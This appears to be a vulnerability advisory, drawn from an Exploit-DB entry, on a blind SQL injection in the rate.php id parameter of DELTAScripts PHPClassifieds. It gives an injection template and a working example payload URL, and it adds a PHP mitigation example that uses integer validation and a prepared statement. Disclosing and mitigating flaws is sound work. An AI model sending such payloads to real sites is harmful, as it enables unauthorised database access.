Vendor: DELTAScripts PHPClassifieds
By: Hamza 'MizoZ' N.
CVSS: 8.8 (HIGH)
Vulnerability: Blind SQL Injection
CWE: 89
Product Name: DELTAScripts PHPClassifieds
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

DELTAScripts PHPClassifieds

The vulnerability is in rate.php, in the $_GET['id'] parameter. An example of the exploit is http://server/rate.php?id=405+and+%28select%20version%28%29%29=5--

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.
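
One way to apply this mitigation to a handler like rate.php, as an added example that is not DELTAScripts code or part of the original advisory: the id value is accepted only as a positive integer, and the lookup uses a bound parameter. The table and column names, the in-memory SQLite database and both function names are assumptions made for the demonstration.

```php
<?php
// Added example: hypothetical handler logic, not the vendor's rate.php.
// Table and column names (ads, rating, votes) are assumptions.

/**
 * Accept the id parameter only if it is a positive integer.
 * Returns the integer, or null when the request must be rejected.
 */
function parse_ad_id(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Look up a rating with a bound parameter instead of string concatenation. */
function fetch_rating(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, rating, votes FROM ads WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ads (id INTEGER PRIMARY KEY, rating REAL, votes INTEGER)');
$db->exec('INSERT INTO ads VALUES (405, 4.5, 12)');

// First value is a legitimate id; the second is the id value from the
// advisory's example URL after URL decoding.
$samples = ['405', '405 and (select version())=5--'];
foreach ($samples as $raw) {
    $id = parse_ad_id($raw);
    if ($id === null) {
        // In a real handler: send HTTP 400 and stop before any query runs.
        echo "rejected: ", $raw, "\n";
        continue;
    }
    $row = fetch_rating($db, $id);
    echo "id {$id}: ", $row === null ? 'not found' : json_encode($row), "\n";
}
```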

Exploit-DB raw data:

/*

Name : DELTAScripts PHPClassifieds
Vuln : Blind SQL Injection

Author : Hamza 'MizoZ' N.
Email : mizozx[at]gmail[dot]com
WebSite : www.greymen.org

Greetz : Zuka, all friends & arab hackers

*/

Vulnerability is in the rate.php, $_GET['id']

[HOST]/[PATH]/rate.php?id=[true value]+[INJECTION]

Examples:
http://server/rate.php?id=405+and+%28select%20version%28%29%29=5--